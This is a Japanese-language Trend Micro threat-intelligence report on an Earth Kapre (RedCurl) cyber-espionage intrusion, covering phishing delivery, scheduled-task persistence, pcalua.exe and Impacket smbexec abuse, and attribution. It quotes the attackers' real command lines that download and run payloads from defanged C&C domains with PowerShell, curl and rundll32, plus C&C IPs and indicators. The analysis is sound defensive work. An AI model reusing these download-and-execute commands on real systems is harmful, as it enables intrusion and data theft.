APT&標的型攻撃
サイバー諜報グループ「Earth Kapre(別称:RedCurl)」の手口を解明:トレンドマイクロMDRによる分析と脅威インテリジェンスの活用
トレンドマイクロのMDRチームは、Earth Kapreによる侵入セットのインシデントに対応し、その手口を解明しました。攻撃者がEarth Kapreであると特定する上では、脅威インテリジェンスが重要な役割を果たしました。
サイバー諜報グループ「Earth Kapre(別称:RedCurlまたはRed Wolf)」は、フィッシングメールによる攻撃キャンペーンを活発に展開し、主にロシア、ドイツ、ウクライナ、イギリス、スロベニア、カナダ、オーストラリア、米国の標的を狙ってきました。攻撃の流れとして、はじめに、不正な添付ファイル(.isoや.img)を含むフィッシングメールが標的組織に届きます。被害者がその添付ファイルを開くと、利用中の端末が感染し、マルウェアを永続化させるタスクスケジュールが登録されます。続いて、機密情報が窃取され、攻撃者のコマンドコントロール(C&C:Command and Control)サーバに転送されます。
最近に入り、トレンドマイクロのMDRチーム(Managed Extended Detection and Response)とIRチーム(Incident Response)では、数多くの端末がEarth Kapreのダウンローダに感染するインシデントに遭遇し、その調査にあたりました。マルウェアを解析したところ、C&Cサーバへの接続を含め、データ窃取に類する動作が確認されました。本事例においてEarth Kapreは、プログラム互換性アシスタント「pcalua.exe」を介して不正なコマンドラインを実行しました。これは、ネットワーク内に紛れ込んで検知を回避する手段です。もう1つの特徴として、最近の活動では見られなくなった古い手口を再利用している点が挙げられます。具体的には、後に使用するダウンローダの取得手段として、正規のツール「powershell.exe」や「curl.exe」を不正利用しました。
トレンドマイクロのMDRチームが実施した調査により、今回Earth Kapreが展開した侵入セットの内容が解明されました。また、残された証跡を元手に脅威インテリジェンスを活用することで、活動の背後にいるサイバー諜報グループが確かにEarth Kapreであると確認されました。本稿では、以上の発見事項について詳しく解説します。
MDRによる調査
トレンドマイクロのMDR脅威ハンティングチームは、はじめに不審なファイル(トレンドマイクロでは以下として検知)が
Trojan.Win64.CRUDLER.A
以下のパスに作成されたことを確認しました。
C:\Windows\System32\ms.dll
さらに調査を進めた結果、下記URLからファイルがcurl.exe経由でダウンロードされたことを確認しました。
http://preston[.]melaniebest[.]com/ms/ms.tmp
https://preslive[.]cn[.]alphastoned.pro/ms/msa.tmp
https://unipreg[.]tumsun[.]com/ms/psa.tmp
http://report[.]hkieca[.]com/ms/msa.tmp
http://preston[.]melaniebest[.]com(23[.]254[.]224[.]79
ファイルが作成される前後の状況を分析した結果、攻撃者による活動の詳細が判明しました。以降、その内容について解説します。
はじめに初期コマンドによってPowerShellが立ち上がり、ファイル(curl.tmp)が以下のURLからダウンロードされ、
http://preston[.]melaniebest[.]com/ms/curl.tmp
「curl.exe」の名前で以下のフォルダの配下に保存されました。
C:\Windows\System32\
ここではダウンロード元ドメインとして以下を例に挙げましたが、先述した4ドメインのいずれにおいても、同じロジックが成立します。
preston[.]melaniebest[.]com
curl.exeはURLからデータを効率的に取得する正規のツールですが、今回のように、攻撃者によって不正利用される場合もあります。
%COMSPEC% /Q /c echo powershell -c "iwr -Uri http://preston[.]melaniebest[.]com/ms/curl.tmp -OutFile C:\Windows\System32\curl.exe -UseBasicParsing" ^> \\127.0.0.1\C$\dvPqyh 2^>^&1 > %TEMP%\KzIMnc.bat & %COMSPEC% /Q /c %TEMP%\KzIMnc.bat & %COMSPEC% /Q /c del %TEMP%\KzIMnc.bat
次に、ファイル「7za.tmp」がダウンロードされ、「7za.exe」の名前で以下のフォルダの配下に保存されました。
C:\Windows\System32\
7sa.exeは、ファイル圧縮・アーカイブ用ユーティリティとして有名な「7-Zip」のコピーに相当します。
C:\Windows\system32\cmd.exe /Q /c echo curl -o C:\Windows\System32\7za.exe http://preston[.]melaniebest[.]com/ms/7za.tmp ^> \\127.0.0.1\C$\xWJhao 2^>^&1 > C:\Windows\TEMP\IAqJUm.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\IAqJUm.bat & C:\Windows\system32\cmd.exe /Q /c del C:\Windows\TEMP\IAqJUm.bat
続いて、同じ以下のドメインからEarth Kapreのローダがcurl.exe経由でダウンロードされ、
http://preston[.]melaniebest[.]com/ms/ms.tmp
「ms.dll」の名前(ps.dllの場合もある)で以下のフォルダの配下に保存されました。
C:\Windows\System32\
上記のスクリプト例からも示されるように、今回の攻撃者は、ファイルのダウンロードから起動に至る一連のコマンドを、「echo(ファイルや画面に文字列を出力するツール)」によってバッチファイルにまとめて書き出し、最後にそれを実行する手法を用いました。本手法はコマンドの動的な生成と実行、タスクの自動化などに有用ですが、攻撃者にとっては難読化の手段としても機能します。その結果、不正な活動の隠蔽、セキュリティ監視の回避、解析妨害などに利用される場合があります。さらに今回の攻撃者は、これらバッチファイルを使用後に削除することで、証拠の隠滅を図りました。
C:\Windows\system32\cmd.exe /Q /c echo curl -o C:\Windows\System32\ms.dll http://preston[.]melaniebest.com/ms/ms.tmp ^> \\127.0.0.1\C$\tZpOKq 2^>^&1 > C:\Windows\TEMP\DFMPAa.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\DFMPAa.bat & C:\Windows\system32\cmd.exe /Q /c del C:\Windows\TEMP\DFMPAa.bat
上記のファイル「ms.tmp」はアーカイブであるため、攻撃者は先にダウンロードした7za.exe(7zip)を用いてその内容を展開しました。その際、パスワードとして「123」を指定しました。
C:\Windows\system32\cmd.exe /Q /c echo 7za.exe x -aoa -p123 C:\Windows\Temp\ms.tmp -o C:\Windows\Temp\ ^> \\127.0.0.1\C$\lgNMiK 2^>^&1 > C:\Windows\TEMP\BuWmUA.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\BuWmUA.bat & C:\Windows\system32\cmd.exe /Q /c del C:\Windows\TEMP\BuWmUA
この後、ms.dll(ps.dllの場合もある)がrundll32.exe経由で実行されました。
%COMSPEC% /Q /c echo rundll32.exe C:\Windows\system32\ms.dll,ms ^> \\127.0.0.1\C$\NoajCy 2^>^&1 > %TEMP%\YdEcul.bat & %COMSPEC% /Q /c %TEMP%\YdEcul.bat & %COMSPEC% /Q /c del %TEMP%\YdEcul.bat
続いて、Pythonスクリプト「client.py」が作成されました。本スクリプトは、外向きの通信を確立し、ポート445のファイル共有プロトコル「SMB:Server Message Block」によってリモートコマンドを実行します。本スクリプトの起動時には、コマンドライン引数として以下の外部IPアドレスが指定されました。
198[.]252[.]101[.]86
このIPアドレスはC&Cサーバを指していると推測されます。
"C:\Users\<ユーザ名>\AppData\Roaming\MUIService\pythonw.exe" C:\Users\<ユーザ名>\AppData\Roaming\MUIService\rpv\client.py --server-ip 198[.]252[.]101[.]86 --server-port 41808
Impacketの存在
Impacketは、ネットワークプロトコルの確立と操作をサポートするPythonクラスのコレクションであり、オープンソースで提供されています。本事例では、標的組織のネットワークからImpacketの動作が検知され、Windows用ネットワークプロトコルを介して対話型のやり取りが行われた可能性が示されました。実際に実行されたコマンドラインを調査した結果、SMBを介した半対話型シェルを立ち上げる機能が確認され、さらにImpacketのスクリプト「smbexec」とも一致することが判明しました。今回の攻撃者はImpacketの機能や汎用性を利用することで、権限を超越して不正なコマンドの実行に及んだと考えられます。
下記の例から示される通り、本調査で確認されたコマンドラインと、Impacketのスクリプト「smbexec」の間には、顕著な類似性が見られました。
Registry root: 3
Registry key: HKLM\SYSTEM\CurrentControlSet\Services\aQpzRMnIku
Registry value name: imagepath
Registry value data: %COMSPEC% /Q /c echo rundll32.exe C:\Windows\system32\ms.dll,ms ^> \\127.0.0.1\C$\NoajCy 2^>^&1 > %TEMP%\YdEcul.bat & %COMSPEC% /Q /c %TEMP%\YdEcul.bat & %COMSPEC% /Q /c del %TEMP%\YdEcul.bat
Registry value type: 2
Registry root: 3
Registry key: HKLM\SYSTEM\CurrentControlSet\Services\kPbzlGKCyO
Registry value name: imagepath
Registry value data: %COMSPEC% /Q /c echo curl -o C:\Windows\System32\ms.dll http://preston.melaniebest.com/ms/ms.tmp ^> \\127.0.0.1\C$\tZpOKq 2^>^&1 > %TEMP%\DFMPAa.bat & %COMSPEC% /Q /c %TEMP%\DFMPAa.bat & %COMSPEC% /Q /c del %TEMP%\DFMPAa.bat
Registry value type: 2
Registry root: 3
Registry key: HKLM\SYSTEM\CurrentControlSet\Services\lzZqdAEwKP
Registry value name: imagepath
Registry value data: %COMSPEC% /Q /c echo curl -o C:\Windows\System32\7za.exe http://preston.melaniebest.com/ms/7za.tmp ^> \\127.0.0.1\C$\xWJhao 2^>^&1 > %TEMP%\IAqJUm.bat & %COMSPEC% /Q /c %TEMP%\IAqJUm.bat & %COMSPEC% /Q /c del %TEMP%\IAqJUm.bat
Registry value type: 2
また、下記のように、netstatを使用してポート「4119」が開かれているかをチェックするコマンドも発見されました。本コマンドの目的として、ポート「4119」に関連するネットワーク接続情報を収集することや、netstatの出力結果から特定のパターンを抽出することなどが考えられます。なお、当該ポートは、「Trend Micro Deep Security Manager」のGUIとAPIに使用されます。この点より、攻撃者は当該製品が感染端末内に存在するかをチェックしようとした可能性があります。
Registry root: 3
Registry key: HKLM\SYSTEM\CurrentControlSet\Services\zOMISPlXbL
Registry value name: imagepath
Registry value data: %COMSPEC% /Q /c echo netstat -an | find "4119" ^> \\127.0.0.1\C$\SspgqD 2^>^&1 > %TEMP%\MjHubF.bat & %COMSPEC% /Q /c %TEMP%\MjHubF.bat & %COMSPEC% /Q /c del %TEMP%\MjHubF.bat
Registry value type: 2
プログラム互換性アシスタントの不正利用によってコマンドを間接的に実行
プログラム互換性アシスタント(pcalua.exe)は、古いプログラムの互換性に関する問題を特定するWindows用のサービスです。本ツールは、攻撃者によってコマンドライン用インタプリタの代用品と見なされ、コマンドの実行やセキュリティ監視の回避手段として用いられる場合があります。本事例では、Earth Kapreの不正な活動を隠蔽する目的で利用されました。
Earth Kapreによるダウンローダの格納先は多岐に渡り、ファイル名としてランダムまたは難読化された文字列が使用されました。今回確認された例を、下記に示します。
C:\Windows\system32\config\systemprofile\AppData\Local\AppList\gkcb92eb2f8982d93a.exe
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Wininet\gkcb92eb2f8982d93a.exe
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Wininet\sgef07b190e6e6d160.exe
C:\Windows\system32\config\systemprofile\AppData\Local\AppList\sgef07b190e6e6d160.exe
C:\Windows\system32\config\systemprofile\AppData\Local\Subscription\ujb7238088847c09ed.exe
C:\Users\<ユーザ名>\AppData\Local\BrokerInfraSVR\fik9562b2dec16c7ad6.exe
C:\Users\<ユーザ名>\AppData\Local\BrokerInfra\izd9562b2dec16c7ad6.exe
C:\Windows\system32\config\systemprofile\AppData\Local\Sysmain\zyp14f2b5c5ecbb07d8.exe
C:\Windows\system32\config\systemprofile\AppData\Local\tw-pfdc-320c6-4e95qd.tmp\pj8434bb720ad953af.exe
C:\Windows\system32\config\systemprofile\AppData\Local\tw-pfdc-320c6-4e95qd.tmp\kmjf1a1952febed5f77.exe
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\DirectoryClient\yff936ad712ca94fc9.exe
C:\Windows\system32\config\systemprofile\AppData\Local\D3DSCache\85ceb3adf3f4542\lva662fdf404f617d07.exe
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PRICache\2630989932\ogh0a430e919a35efd8.ex
C:\Windows\system32\config\systemprofile\AppData\Local\Plex\ComponentODN\ylob1c94b2421ca1d39.exe
C:\Users\<ユーザ名>\AppData\Roaming\VirtualStore\ChromeSY_Q05MQVAyMw==.exe
下図に示す以下のファイルは、pcalua.exeによって作成されたダウンローダであり、
gkcb92eb2f8982d93a.exe
先述の以下のドメインに接続することが確認されました。
preston[.]melaniebest[.]com
Earth Kapreのダウンローダは、ネットワーク接続の有効性をチェックするため、HTTPのGETリクエストを下記ドメインのいずれかにランダムで送信します。
- www.amazon.com
- www.bing.com
- duckduckgo.com
- www.ebay.com
- www.google.com
- www.google.co.uk
- www.microsoft.com
- www.msn.com
- ocsp.digicert.com
- ocsp.pki.goog
- ocsp.usertrust.com
- openid.ladatap.com
- www.reddit.com
- unipreg.tumsun.com
- www.wikipedia.org
- x1.c.lencr.org
- www.yahoo.com
今回入手したダウンローダの検体を解析した結果、内部でAPI「InternetOpenA」や「InternetConnectA」が用いられていることが判明しました。これらのAPIは、HTTPリクエストの送信や、ネットワーク接続の有無確認に使用されるものです。
タスクスケジュールの登録による永続化
本事例では図7に示すように、永続化の手段としてタスクスケジュールが登録されました。この結果、Earth Kapreのダウンロードが起動する前に、さまざまなタスクが実行されました。図7より、ダウンローダの起動前に、不審な以下のタスクが実行されたことが分かります。
タスク:CacheTask(ef07b190e6e6d160)
processCmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
schtasks /run /tn "\Microsoft\Windows\Wininet\CacheTask ef07b190e6e6d160" "pcalua.exe" -a C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Wininet\sgef07b190e6e6d160.exe
タスクの名前や実行対象ファイルの名前、およびその場所は、感染端末毎に異なります。図8に、不正なタスクスケジュールタスクが登録された証跡を示します。本タスクにより、以下のファイルが1時間毎に実行されます。
C:\Users\<ユーザ名>\AppData\Local\Sysmain\oxdece5f42fddfbde1.exe
C:\Windows\System32\Tasks
作成されるタスクの名前は端末毎に異なりますが、ルールとして、ダウンローダのファイル名が部分的に使用されます。例えば、ダウローダのファイル名が以下の場合、
ef07b190e6e6d160.exe
それを実行するタスクの名前は以下となります。
CacheTask ef07b190e6e6d160
実際に標的ネットワークに属する感染端末内で作成されたタスクの名前を下記に示します。
schtasks /run /tn "\Microsoft\Windows\Wininet\CacheTask ef07b190e6e6d160"
schtasks /run /tn "\Microsoft\Windows\WDI\ResolutionHost 8434bb720ad953af"
schtasks /run /tn "\Microsoft\Windows\WDI\ResolutionHost f1a1952febed5f77"
schtasks /run /tn "\Microsoft\Windows\WindowsColorSystem\Calibration-Loader 3db1281b443ad4a0"
schtasks /run /tn "\Microsoft\Windows\WlanSvc\CDSSync b1c94b2421ca1d39"
schtasks /run /tn "\Microsoft\Windows\WOF\WIM-Hash-Management 0a430e919a35efd8"
schtasks /run /tn "\Microsoft\Windows\WwanSvc\NotificationTask 662fdf404f617d07"
schtasks /run /tn "\Microsoft\Windows\BrokerInfrastructure\BgTaskRegistrationMaintenanceTask 9eeb010c178ac301"
schtasks /run /tn "\Microsoft\Windows\CloudExperienceHost\CreateObjectTask deacb04715b35f40"
schtasks /run /tn "\Microsoft\Windows\Defrag\ScheduledDefrag 8ba2c22cafd02f59"
schtasks /run /tn "\Microsoft\Windows\DeviceDirectoryClient\HandleWnsCommand f936ad712ca94fc9"
schtasks /run /tn "\Microsoft\Windows\AppListBackup\BackupNonMaintenance cb92eb2f8982d93a"
schtasks /run /tn "\Microsoft\Windows\Subscription\LicenseAcquisition b7238088847c09ed"
schtasks /run /tn "\Microsoft\Windows\Sysmain\ResPriStaticDbSync 14f2b5c5ecbb07d8"
侵入経路の分析
本事例では、第一の被害端末に「Trend Micro XDR」がインストールされていなかったため、侵入経路を直接的に追える範囲は限られていました。そこで今回は、インシデント内で確認されたインフラに類似する別のインフラを探索、関連付けることによって、欠落している情報を補うアプローチを採用しました。具体的には、本調査で確認されたIPアドレス「23[.]254[.]224[.]79」を起点として、それに紐づく各種データポイントを渡り歩く形で探索を行いました。探索方法として、サイバー脅威インテリジェンスに基づくシステマティックなルールを採用しました。この結果、侵入に用いられた可能性が最も高い経路として、不正な添付ファイルを含むフィッシングメールが浮上しました。本事例で確認された検体も、すでに出回っているEarth Kapreの検体も、同じインフラを利用し、メール添付のISOファイルやIMGファイルとして標的側に届くことが確認されました。
サイバー脅威インテリジェンスを用いることで、データの拡充(データエンリッチメント)や関連付けの技術が統合され、侵入経路をピンポイントで特定することが可能となりました。その様子を、以降の図で示します。
攻撃者の特定
さまざまなデータポイントや証跡が、本事例の背後にEarth Kapreがいることを示しています。これは、当該グループによる攻勢の強さを裏付けるものです。以降、その詳細について解説します。
C&Cのインフラ
今回確認されたC&Cサーバの全てが、以下のIPアドレスに関連付けられます。
23[.]254[.]224[.]79
本IPアドレスはEarth KapreのC&Cサーバに相当することが、2023年後半から現在にかけて発見された検体の解析結果によって示されています。
23[.]254[.]224[.]79
先述のPythonスクリプト「client.py」に引数として渡された以下のIPアドレスは、Earth Kapreが送信したフィッシングメールの1つと関連付けられます。
198[.]252[.]101[.]86
当該メールの添付ファイルを引き金として、Earth Kapreのダウンローダや不正なLNKファイルがダウンロードされます。
198[.]252[.]101[.]86
フィッシングメールとIPアドレスの繋がりは、メールヘッダーにあります。メールヘッダーには攻撃者から被害者までの配送履歴(ルーティング)が含まれ、その初回ホッピング情報として対象のIPアドレスが記録されています。
198[.]252[.]101[.]86
コードや挙動面での類似性
本インシデントで確認された検体のコードを分析したところ、Earth Kapreによる過去の活動で用いられたダウンローダに似ていることが分かりました。一見するとコードは異なっていましたが、厳密な分析の結果、機能面では非常に似通っていることが判明しました。
具体例として、文字列の復号処理が挙げられます。本インシデントの検体は、復号に必要な「Bcrypt」の各種APIに対応するアドレス値をランタイム中に取得し、これを呼び出します。一方、古いタイプの検体は、当該APIをインポートして呼び出します。このようにAPIの呼び出し方式は異なるものの、復号処理の内容自体に大差は見られませんでした。
- ハードコーディングされた文字列(yxNLWpc0s4JUTR8O3GOJC)のSHA256値を算出する
- SHA256値の一部をAES(Advanced Encryption Standard)の復号鍵として使用する
Earth Kapreのダウンローダに相当する古い検体と新しい検体を比較したところ、両者の類似度は70%から90%の範囲に収まりました。この他、インターネットが有効であるかの判別法や、C&Cサーバとの通信手法についても、互いに類似していることが確認されました。
ダイアモンドモデルによる侵入分析
侵入分析を行う上で重要なサイバーセキュリティ・フレームワークとして、「ダイアモンドモデルによる侵入分析」が挙げられます。本モデルでは、脅威を「攻撃者」、「インフラ」、「能力」、「被害者」という4つの観点から分析することで、サイバー攻撃を「誰が」、「なぜ」、「どのように」行っているのかを明確化します。こうした理解は、セキュリティ専門家による脅威の予測や準備に役立つものです。また、本モデルを適用する際には、攻撃が実行された地理的な場所や、グループの識別情報、資金提供者、動機、活動履歴などを追跡します。
- 攻撃者:攻撃の実行者
- 能力:攻撃者が用いる手口やツール
- インフラ:攻撃者が用いる物理的、または論理的なリソース
- 被害者:攻撃される側の組織やシステム
サイバーセキュリティの専門家は、上記の4要素を総合的に分析することで、脅威の実態を包括的に把握することが可能となり、それによって攻撃グループの特定に繋がる重要な手がかりが得られます。さらにダイアモンドモデルは、利用可能なデータの分類や解析に向けた体系的なアプローチを提供します。これによりセキュリティチームでは、サイバーセキュリティの戦略や対応に関する意思決定を、有用な情報に基づいて下すことが可能となります。
今回は、ダイアモンドモデル上で「2つのツール」と呼ばれるガイドラインを適用しました。このルールでは、複数の侵入セットをダイアモンド上で見比べ、各頂点の一致具合を調べます。2つ以上の頂点が合致し、かつ、それが類似性の論拠として認められる場合には、両侵入セットの実行者が同一である可能性が高いものと考えます。
本インシデントで顧客の環境から取得された検体と、すでに広く出回っているEarth Kapreについて、ダイアモンドモデルの「能力」を起点とする比較を行いました。結果、本インシデントによる検体の方が構造的には刷新されているものの、両者とも同じインフラを指していることが判明しました。能力とインフラの双方が合致したことより、本インシデントの検体は、確かにEarth Kapreによるものであることが確認されました。
まとめ
今回の事例から示されるように、Earth Kapreの脅威は依然として活発に続いています。本サイバー諜報グループの標的は世界各地にまたがり、さまざまな業種を含んでいます。その手口も巧妙であり、例えばPowerShellやcurl、プログラム互換性アシスタント(pcalua.exe)などの正規なツールを介して攻撃用コマンドを実行することで、標的ネットワーク内の検知機能を回避しようとします。
本事例では、標的ネットワークからImpacketの挙動が検知されました。当該ツールがWindowsネットワークプロトコルによる対話型通信の手段として用いられる傾向について、今後、十分に注意していく必要があります。攻撃者にとって、本ツールが備える機能や汎用性は、権限を超越してコマンドを実行する強力な手段となる可能性があります。
今回の報告は、インシデント分析における脅威インテリジェンスの有用性を示すものです。特に、包括的な状況判断や保護対策に不可欠なエビデンスが欠落している場合は、脅威インテリジェンスを活用することで、その不足を補うことが可能となります。セキュリティの強化を目指す企業や組織にとって、攻撃の背後にいるグループの情報を得ることは、最重要事項の1つです。こうした情報は、攻撃者の目的を把握する上で役立つだけでなく、特定の脅威に適したセキュリティ対策を確立する際にも大きな力を発揮します。
本インシデントから示されるように、侵入セットの解明に向けたMDRの取り組みは、サイバーセキュリティそのものに大きく寄与します。今回、限られた証跡を元手に実行グループがEarth Kapreであると特定する上で、MDRが重要な役割を担いました。こうした働きは、脅威の検知や応答を目的とする高度なソリューションを一層強化し、攻撃グループの巧妙な手口に対抗する上で役立つものです。
また、企業や組織が用いるシステムへの侵入経路(エンドポイント、メール、Web、ネットワークなど)を保護する上では、マルチレイヤーのアプローチが特に有効です。例えば、以降に挙げるトレンドマイクロのソリューションは、企業や組織のシステムを保護するために、不正なコンポーネントや不審な挙動を的確に検知します。
- Trend Vision One™:マルチレイヤーによる挙動検知や保護の機能を提供し、ランサムウェアをはじめとするマルウェアがシステムに修復不能な損害を与える前に、不審な挙動やツールをブロックします。
- Trend Cloud One™ - Workload Security:既知、未知を問わず、脆弱性を突いた脅威からシステムを保護します。この保護機能は、仮想パッチや機械学習などの技術によって実現しています。
- Trend Micro™ Deep Discovery™ Email Inspector:独自のサンドボックスと高度な解析技術を備え、フィッシングメールなどの不正なメールを的確にブロックすることで、ランサムウェアを含むマルウェアの侵入を阻止します。
- Trend Micro Apex One™:次世代レベルの自動脅威検知・応答機能を提供し、ファイルレス攻撃やランサムウェアを含む高度な手口に対しても的確に対処することで、エンドポイントを確実に保護します。
侵入の痕跡(Indicators of Compromise、IoC)
侵入の痕跡(IoC)はこちらで確認してください。
参考記事:
Unveiling Earth Kapre aka RedCurl’s Cyberespionage Tactics With Trend Micro MDR, Threat Intelligence
By: Buddy Tancio, Maria Emreen Viray, Mohamed Fahmy
翻訳:清水 浩平(Core Technology Marketing, Trend Micro™ Research)